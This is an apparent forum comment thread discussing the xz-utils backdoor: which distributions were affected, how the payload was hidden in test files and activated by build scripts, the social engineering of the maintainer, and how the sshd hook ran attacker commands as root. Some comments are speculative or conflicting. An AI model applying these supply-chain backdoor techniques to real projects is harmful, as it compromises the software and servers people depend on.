It was only in rolling release/testing/unstable distributions, a pretty small subset of systems in the grand scheme of things, is why I said that. It was introduced in February 23 release of xz. This could've been years until discovered.
Never use unstable/testing on real servers, that's a bad idea for entirely different reasons.
Homebrew had updated to the backdoored version, so although it doesn’t appear to trigger on Mac OS, you should update things to ‘upgrade’ From 5.6.1 to 5.4.6.
Does anyone know if a honeypot has been set up for this?
In the event that exploit code has already been deployed, while these exploit attempts should now thankfully be futile, is there any valuable information that can be gained about the network sources of these exploit attempts?
We might assume that since this attack was foiled, exploit attempts won't happen, but if this is an automated botnet project, there may already be other operational elements in the wild that are knocking?
It's possible that there is an infection detection component to the project which is already measuring baseline accessibility, possibly using this and several alternate vectors. After all, effort was made to evade exploit attempt detection which would enable valuable active monitoring since it shouldn't trigger suspicions.
Maybe their organisation has a policy that requires stronger encryption? Possibly because that organisation is also in the business of cracking such encryption...
Qualitatively, 2^128 is already computationally infeasible(barring some advance in quantum computing), so the meaningful difference in security is debatable, assuming no weaknesses in the underlying curve.
Arch Linux uses a native/unpatched version of OpenSSH without dependency on libsystemd and thus without dependency on xz-utils, resulting in no exploitable code path. This means that at least the currently talked about vulnerability/exploit via SSH did presumably not work on Arch. Disclaimer: This is my understanding of the currently circulating facts. Additional fallout might be possible, as the reverse engineering of the backdoor is ongoing.
Just to extend the sibling comment with an excerpt of the Arch announce mail regarding the backdoor:
>From the upstream report [1]:
> openssh does not directly use liblzma. However debian and several other
distributions patch openssh to support systemd notification, and libsystemd
does depend on lzma.
Arch does not directly link openssh to liblzma, and thus this attack vector is not possible. You can confirm this by issuing the following command:
```
ldd "$(command -v sshd)"
```
However, out of an abundance of caution, we advise users to remove the malicious code from their system by upgrading either way. This is because other yet-to-be discovered methods to exploit the backdoor could exist.
I think they added it in parts over the course of a year or two, with each part being plausibly innocent-looking: First some testing infrastructure, some test cases with binary test data to test compression, updates to the build scripts – and then some updates to those existing binary files to put the obfuscated payload in place, modifications to the build scripts to activate it, etc.
That thread has become an online event and obviously lost its original constructive purpose the moment the malicious intent became public. The commenters are not trying to alter history, it's leaving their mark in an historic moment. I mean the "lgtm" aged like milk and the emoji reactions are pretty funny commentary.
Did the artefact produced [0] for fussing even include the backdoored .so? My understanding was that the compromised build-scripts had measures to only run when producing deb/rpms.
The headline seems like a distinction without a difference. Bypassing ssh auth means getting a root shell. There is no significant difference between that and running system(). At most maybe system() has less logging.
My sense was this backdoor gets to execute whatever it wants using whatever "user" sshd is running as. So even if root logins are disabled, this backdoor doesn't care.
We basically need to analyse dependencies used in critical code paths (e.g. network attached services like sshd) and then start a process to add more rigorous controls around them. Some kind of enhanced scrutiny, certification and governance instead of relying on repos with individual maintainers and no meaningful code reviews, branch protection, etc.
And by we I mean at international/governmental level. Free software needs to stop being $free.
Society needs to start paying for the critical foundations upon which we all stand.
It was just that it hooks to `RSA_public_decrypt` which threw me off, I didn't really understand this backdoor much. I only have one Debian sid machine which was vulnerable and accessible via a public IPv4 ssh, I'm not sure if I should just wipe it.
If the RCE is Russian, it could be used a communication kill-switch on the morning of an attack outside Ukraine, similar to the Viasat hack https://en.m.wikipedia.org/wiki/Viasat_hack
why would being russian make it this? it could be if it was made in any country. they did this attack once, okay? but its not like other countries dont pay attention.
My suggestion: Put your SSH behind WireGuard and/or behind a jump host (with only port forwarding allowed, no shell). If you don’t have a separate host, use a Docker container.
If you use a jump host, consider a different OS (e.g., BSD vs Linux). Remember this analogy with slices of Swiss cheese used during the pandemics? If one slice has a hole, the next slice hopefully won’t have a hole on the same position. The more slices you have, the better for you.
Although for remote management, you don’t want to have too many “slices” you have to manage and that can fail.
I would, by routine, advise that publicly available boxes are configured to accept connections only from whitelisted sources, doing that at the lowest possible level on the stack. That’s usually how secure environments such as those used in PCI compliant topologies are specified.
Right now, nothing. The issue didn’t reach mainstream builds except nightly Red Hat and Fedora 41. The xz version affected has already been pulled and won’t be included in any future software versions.
Whilst we are in 3bp mode, what happen if a state actor want to harm open source … not to destroy it but to pollute it … as said you can check and test all. Legal … they do not care.
I wonder.
… We are all good vs even Buddha has evil nature mental model.
Down voted for asking a valid question? Or is every reader of every HN post expected to be an in depth expert in every article posted every minute of every day of the year? What kind of asshole who has earned the right to down vote comments on HN would down vote a legitimate question?
My first instinct would be no, as wireguard runs in kernel space(if you're using kernel wireguard, not wireguard-go/some other userspace implementation),and couldn't link in liblzma, a userspace component.
I don't think that's what OP is asking. I think OP is asking if wireguard functions could be hooked in the same way as sshd functions are in this exploit.
Well, yes, I can, but unlike ssh which is open to the world, my VPN is only open to me and the family. It seems like that greatly reduces the potential attack surface.
A subsequent investigation found that the backdoor was a culmination of approximately 3 years of effort by a user going by the name Jia Tan and the nickname JiaT75, who appears to have made a concentrated effort to gain access to a position of trust within the xz project, by putting pressure on the head maintainer to step down and hand over the control of the project.[3]
One of the takeaways from this to me is that there is way too much sketchy bullshit happening in critical system software. Prebuilt binary blobs [1]? Rewriting calls to SIMD enhanced versions at runtime [2]? Disabling sanitizers [3]? Incomprehensible build scripts [4]?
All of this was either at least strongly frowned upon, if not outright unacceptable, on every project I've ever worked on, either professionally or for fun. And the stakes were far lower for those projects than critical linux system software.
My understanding is that the binary blobs were test data. Find a bug that happens on certain input. Craft a payload that both triggers the bug and does the malicious thing you want to do. Add the binary blob to /tests/files/. Then write a legitimate test to ensure that the bug goes away.
Then do some build script bullshit to somehow get that binary into the build.
> Rewriting calls to SIMD enhanced versions at runtime?
That's something that's been done for decades. It's pretty normal. What's not normal is for that to get re-done after startup. That is, one library should not be able to get that resolution process to be re-done after it's been done once. Malicious code that knows the run-time linker-loader's data structures could still re-resolve things anyways, which means that even removing this feature altogether from the run-time linker-loader wouldn't prevent this particular aspect of this attack.
I have found it irritating how in the community, in recent years, it's popular to say that if a project doesn't have recent commits or releases that something is seriously wrong. This is a toxic attitude. There was nothing wrong with "unmaintained" lzma two years ago. The math of the lzma algorithm doesn't change. The library was "done" and that's ok. The whiny mailing list post from the sock puppet, complaining about the lack of speedy releases, which was little more than ad hominem attacks on the part time maintainer, is all too typical and we shouldn't assume those people are "right" or have any validity to their opinion.
> The math of the lzma algorithm doesn't change. The library was "done" and that's ok.
Playing devil's advocate: the math doesn't change, but the environment around it does. Just off the top of my head, we have: the 32-bit to 64-bit transition, the removal of pre-C89 support (https://fedoraproject.org/wiki/Changes/PortingToModernC) which requires an autotools update, the periodic tightening of undefined behaviors, new architectures like RISC-V, the increasing amount of cores and a slowdown in the increase of per-core speed, the periodic release of new and exciting vector instructions, and exotic security features like CHERI which require more care with things like pointer provenance.
Actually, the new architectures are a big source of concerns. As a maintainer of a large open source project, I often received pull requests for CPU architectures that I never had a chance to touch. Therefore I cannot build the code, cannot run the tests, and do not understand most of the code. C/C++ themselves are portable, but libs like xz needs to beat the other competitors on performance, which means you may need to use model specific SIMD instructions, query CPU cache size and topology, work at very low level. These code are not portable. When people add these code, they often need to add some tests, or disable some existing tests conditionally, or tweak the build scripts. So they are all risks.
No matter how smart you are, you cannot forecast the future. Now many CPUs have a heterogeneous configuration, which means they have big cores and little cores. But do all the cores have the same capabilities? Is possible that a CPU instruction only available on some of the CPU cores? What does it mean for a multithreaded application? Would it be possible that 64-bit CPUs may drop the support for 32-bit at hardware level? Tens years ago you cannot predict what's going to happen today.
Windows has a large compatibility layer, which allows you running old code on the latest hardware and latest Windows. It needs quite a lot efforts. Many applications would crash without the compatibility patches.
I am a former MS employee, I used to read the compatibility patches when I was bored at the office.
Anyway, liblzma does not "need" to outperform any "competition". If someone wants to work on some performance optimization, it's completely fair to fork. Look at how many performance oriented forks there are of libjpeg. The vanilla libjpeg still works.
and then that fork becomes more performant or feature rich or secure or (etc), and it becomes preferred over the original code base, and all distributions switch to it, and we're back at square one.
Excellent point. I believe that's coming from corporate supply chain attack "response" and their insistence on making hard rules about "currency" and "activity" and "is maintained" pushes this kind of crap.
> (Random user or sock puppet) Is XZ for Java still maintained?
> (Lasse) I haven't lost interest but my ability to care has been fairly limited mostly due to ...
> (Lasse) Recently I've worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we'll see. It's also good to keep in mind that this is an unpaid hobby project
With a few years worth of work by a team of 2-3 people: one writes and understand the code, one communicates, a few others pretend to be random users submitting ifunc patches, etc., you can end up controlling the project and signing releases.
I mostly agree with you, but I think your argument is wrong. Last month I found a tiny bug in Unix's fgrep program(the bug has no risk). The program implements Aho Corasick algorithm, which hasn't changed much over decades. However, at least when the code was released to 4.4BSD, the bug still existed. It is not much a concern as nowadays most fgrep progroms are just an alias of grep. They do not use the old Unix code anymore. The old Unix code, and much part of FreeBSD, really couldn't meet today's security standard.For example, many text processing programs are vulnerable to DoS attacks when processing well-crafted input strings. I agree with you that in many cases we really don't need to touch the old code. However, it is not just because the algorithm didn't change.
A software project has the features it implements, the capabilities it offers users, and the boundary between itself and the environment in which those features create value for the user by becoming capabilities.
The "accounting" features in the source code may be finished and bug-free, but if the outside world has changed and now the user can't install the software, or it won't run on their system, or it's not compatible with other current software, then the software system doesn't grant the capability "accounting," even though the features are "finished."
Nothing with a boundary is ever finished. Boundaries just keep the outside world from coming in too fast to handle. If you don't maintain them then eventually the system will be overwhelmed and fail, a little at a time, or all at once.
I feel like this narrative is especially untrue for things like lzma where the only dependencies are memory and CPU, and written in a stable language like C. I've had similar experiences porting code for things like image formats, audio codecs, etc. where the interface is basically "decode this buffer into another buffer using math". In most cases you can plop that kind of library right in without any maintenance at all, it might be decades old, and it works. The type of maintenance I would expect for that would be around security holes. Once I patched an old library like that to handle the fact that the register keyword was deprecated.
C is not stable, CPU microarchitecture versions are coming from time to time. LZMA compression is not far from trivial. the trade-offs made back then might not be the most useful ones now, hence there are usually things that make sense to change even if the background math will be the same forever.
sure, churn and make believe maintenance for the sake of feeling good is harmful. (and that's where the larger community comes in, distributions, power users, etc. we need to help good maintainers, and push back against bad ones. and yes this is - of course - easier said than done.)
Smaller boundaries are likelier to need less maintenance, but nothing stands still. The reason you can run an ancient simple binary on newer systems is that someone has deliberately made that possible. People worked to make sure the environment around its boundary would stay the same instead of drifting randomly away with time—usually so doggedly (and thanklessly) that we can argue whether that stability was really a result of maintenance or just a fact of nature.
2 popular and well tested rust yaml libraries have recently been marked as unmaintained and people are moving away from them to brand new projects in a rush because warnings went out about it.
> There was nothing wrong with "unmaintained" lzma two years ago.
Well, that's not exactly true. The first patch from Jia Tan is a minor documentation fix, and the second is a bugfix which, according to the commit message (by Collin), "breaks the decoder badly". There's a few more patches after that that fix real issues.
Mark Adler's zlib has been around for a lot longer than xz/liblzma, and there's still bugfixes to that, too.
> Libselinux pulls in liblzma too and gets linked into tons more programs than libsystemd. And will end up in sshd too (at the very least via libpam/pam_selinux). And most of the really big distros tend do support selinux at least to some level. Hence systemd or not, sshd remains vulnerable by this specific attack.
> The sshd in Devuan does link to a libsystemd stub - this is to cut down on their maintenance of upstream packages. However that stub does not link to lzma.
Stage 2 "extension" mechanism
This whole thing basically looks like an "extension/patching" system that would allow adding future scripts to be run in the context of Stage 2, without having to modify the original payload-carrying test files. Which makes sense, as modyfing a "bad" and "good" test files over and over again is pretty suspicious. So the plan seemed to be to just add new test files instead, which would have been picked up, deciphered, and executed.
I already felt like this was way too sophisticated for a random cybercriminal. It's not like making up fake internet identities is very difficult, but someone has pretended to be a good-faith contributor for ages, in a surprisingly long-term operation. You need some funding and a good reason to pull off something like that.
This could also be a ransomware group hoping to break into huge numbers of servers, though. Ransomware groups have been getting more sophisticated and they will already infiltrate their targets for months at a time (to make sure all old backups are useless when they strike), so I wouldn't put it past them to infiltrate the server authentication mechanism directly.
I don't know that they had a singular target necessarily. Much like Solarwinds, they could take their pick of thousands of targets if this had gone undetected.
I think we can all agree this attacker was sophisticated. But why would a government want to own tons of random Linux machines that have open sshd mappings? You have to expose sshd explicitly in most cloud environments (or on interesting networks worthy of attack.) Besides, the attacker must've known that if this is all over the internet eventually someone is going to notice.
I think the attacker had a target in mind. They were clearly focused on specific Linux distros. I'd imagine they were after a specific set of sshd bastion machine(s). Maybe they have the ability to get on the VPN that has access to the bastion(s) but the subset of users with actual bastion access is perhaps much smaller and more alert/less vulnerable to phishing.
So what's going to be the most valuable thing to hack that uses Linux sshd bastions? Something so valuable it's worth dedicating ~3 years of your life to it? My best guess is a crypto exchange.
> Something so valuable it's worth dedicating ~3 years of your life to it?
This isn't the right mindset if you want to consider a state actor, particularly for something like contributing to an open source project. It's not like you had to physically live your cover life while trying infiltrate a company or something.
Yes, this is a lot of resources to spend, but at the same, even dedicating one whole FTE 3 years isn't that much resources. It's just salary at that point.
That still implies there was a target in mind. But also they would've had to assume the access would be relatively short-lived. This means to me they had something specific they wanted to get access to, didn't plan to be there long, and weren't terribly concerned about leaving a trail of their methods.
Why couldn't they have had 50 or 100 targets in mind, and hoped that the exploit would last for at least the month (or whatever) they needed to accomplish their multiple, unrelated goals?
I think your imagination is telling you a story that is prematurely limiting the range of real possibilities.
Government have lot of money and time to spend. So having one more tool in box for that single time you need to access a target where this work is entirely reasonable investment. Would this if it weren't used have been noticed possibly in years? That gives quite a lot of room to find target for times when it is needed.
And you could have multiple projects doing this type of work in parallel.
Seems like to me they had perfectly good enough sock puppet accounts. It wasn't at all obvious they were sock puppets until someone detected the expliot.
I imagine such actors are embed within major consumer tech teams, too: Twitter, TikTok, Chrome, Snap, WhatsApp, Instagram... covers ~70% of all humanity.
This could be something that agent that infiltrated into companies could use to execute stuff on internal hosts that they have SSH connectivity to but no access.
You could get into bastion hosts and then to PROD and leave no log traces.
What is the possibility of identity theft that is commenced on state-level? There are reports that the time the backdoor was pushed do not match the usual timing of changes committed by the author.
It also seems like a convenient ground for a false flag operation: hijacking an account that belong to a trustworthy developer from another country.
I do not know why I read Golang issue threads. I always get angry at the we-know-better attitude. With just a dash of, "Well, that's not how Google does it. Why don't you just do better internally?"
I've seen a lot of discussion on the topic but have yet to see someone just specify which versions of xz are likely affected so that I can verify whether I'm running them or not ..
It just seems implausible that the malicious x86 code would not have shown up in strace, perf record, or some backtrace. Once this ended up in all the major distros, some syscall or glibc call would have eventually looked like a red flag to someone before long.
What I’d like to understand is it’s proven intentional?
My understanding is it was a few added characters in a header file. I can’t tell you the number of times I was tired and clicked an extra key before committing, or my cat walked across the keyboard while I was out of the room.
You should read up on the attack. The few characters were part of avoiding a specific case of detection. The back door is very large, is only added during tar build, and happens to only work when a special key is presented.
That’s not an explanation about exactly how intention was derived.
I suppose I’m asking for the chain of events that led to the conclusion. I see lots of technical hot takes for how something could work, with no validation it does, nor intent behind it.
I’d like to understand what steps we know were taken and how that presents itself.
It was a few added characters in a header file to make it possible to deliver the actual payload: 80+ kilobytes of machine code. There's no way to actually tell, but I'd estimate the malware source code to be O(10000) lines in C.
It's actually pretty sophisticated. You don't accidentally write a in-memory ELF program header parser.
I think their problem with open source is more that they can't have complete control and make every user's decision for them, security is just a nice tag along to that.
Maybe we should consider moving more and more system process to webassembly. wasmtime has a nice sandbox. Surely it will decrease the performance, but performance is not always that important. For example, on my dev machine even if SSHD or apache's performance dropped 3x because of that, I wouldn't mind. If I really care, spend more money to get a more powerful CPU.
https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9...
Full list of decoded strings here:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01
--
For someone unfamiliar with openssl's internals (like me): The N value, I presume, is pulled from the `n` field of `rsa_st`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which is a `BIGNUM`:
https://github.com/openssl/openssl/blob/56e63f570bd5a479439b...
Which appears to be a variable length type.
The back door pulls this from the certificate received from a remote attacker, attempts to decrypt it with ChaCha20, and if it decrypts successfully, passed to `system()`, which is essentially a simple wrapper that executes a line of shellscript under whichever user the process is currently executing.
If I'm understanding things correctly, this is worse than a public key bypass (which myself and I think a number of others presumed it might be) - a public key bypass would, in theory, only allow you access as the user you're logging in with. Assumedly, hardened SSH configurations would disallow root access.
However, since this is an RCE in the context of e.g. an sshd process itself, this means that sshd running as root would allow the payload to itself run as root.
Wild. This is about as bad as a widespread RCE can realistically get.